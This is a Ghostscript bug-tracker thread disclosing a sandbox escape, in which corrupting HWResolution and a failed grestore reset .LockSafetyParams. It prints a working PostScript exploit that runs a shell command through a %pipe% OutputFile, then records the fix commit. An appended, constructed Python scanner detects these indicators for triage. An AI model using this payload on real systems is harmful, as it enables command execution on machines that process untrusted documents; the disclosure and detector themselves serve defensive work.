This has been moved from the never-ending bug #699654. The last comment in that thread demonstrates a similar issue to the original report, but using grestore instead of restore:

-------------------------------------------------------------------------------

GS>currentpagedevice wcheck ==
false
GS>currentpagedevice /HWResolution get wcheck ==
true

You can't def HWResolution (for example), but you can just put or astore into it. If you put some junk in there, then grestore doesn't work:

GS>a0
GS>currentpagedevice /HWResolution get 0 (foobar) put
GS>grestore
Error: /rangecheck in .installpagedevice

Then LockSafetyParams is false again:

GS>mark currentdevice getdeviceprops .dicttomark /.LockSafetyParams get == pop
false

That doesn't work with save (only gsave), so full exploit:

a0
currentpagedevice /HWResolution get 0 (foobar) put
{ grestore } stopped {} if
mark /OutputFile (%pipe%id) currentdevice putdeviceprops
showpage
*** Bug 699697 has been marked as a duplicate of this bug. ***
I have a fix for this which I've asked Chris to review, especially to review any non-standard devices which might be vulnerable in the same way. I imagine we'll have a fix committed shortly.
Commit 7ba6d80c69f0c74601ffc1077d27e0d1a299e57f addresses this issue.
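Added example, not part of the original thread or of Ghostscript: a small triage scanner for untrusted PostScript that tokenizes the input (skipping comments, decoding string escapes) and reports the device-parameter indicators seen in the report above. The function names, the indicator set and both sample inputs are constructed for illustration.

```python
import re

# Names used in the report above; a leading "/" is stripped before comparison.
SUSPECT_NAMES = {"putdeviceprops", "OutputFile", ".LockSafetyParams"}
NAME_RE = re.compile(r"/{0,2}[^\s()<>\[\]{}/%]*")

def ps_tokens(src):
    """Yield ('string'|'name', text) from PostScript source text."""
    i, n = 0, len(src)
    while i < n:
        c = src[i]
        if c == "%":                        # comment: skip to end of line
            while i < n and src[i] not in "\r\n":
                i += 1
        elif c == "(":                      # literal string; parentheses nest
            depth, buf, i = 1, [], i + 1
            while i < n and depth:
                ch = src[i]
                if ch == "\\" and i + 1 < n:
                    octal = re.match(r"[0-7]{1,3}", src[i + 1:i + 4])
                    if octal:               # \ddd escape, e.g. \045 is "%"
                        buf.append(chr(int(octal.group(), 8) & 0xFF))
                        i += 1 + len(octal.group())
                    else:                   # \( \) \\ and similar: keep the char
                        buf.append(src[i + 1])
                        i += 2
                    continue
                depth += (ch == "(") - (ch == ")")
                if depth:
                    buf.append(ch)
                i += 1
            yield ("string", "".join(buf))
        elif c.isspace() or c in "{}[]<>)":
            i += 1
        else:                               # name or operator token
            tok = NAME_RE.match(src, i).group()
            i += max(1, len(tok))
            yield ("name", tok)

def triage(src):
    """Return the sorted indicators found in one PostScript document."""
    hits = set()
    for kind, text in ps_tokens(src):
        if kind == "string" and text.startswith("%pipe%"):
            hits.add("%pipe% string")
        elif kind == "name" and text.lstrip("/") in SUSPECT_NAMES:
            hits.add(text.lstrip("/"))
    return sorted(hits)

# Constructed samples: the device-parameter line from the report, and a benign page.
REPORTED = "mark /OutputFile (%pipe%id) currentdevice putdeviceprops"
BENIGN = "% (%pipe%id) only in a comment\n(100% \\(pipe\\) safe) show gsave grestore showpage\n"
```

An empty result does not show that a file is safe, because PostScript can assemble names and strings at run time and hex strings are not decoded here; the scanner is for triage only, and the commit referenced above is the fix.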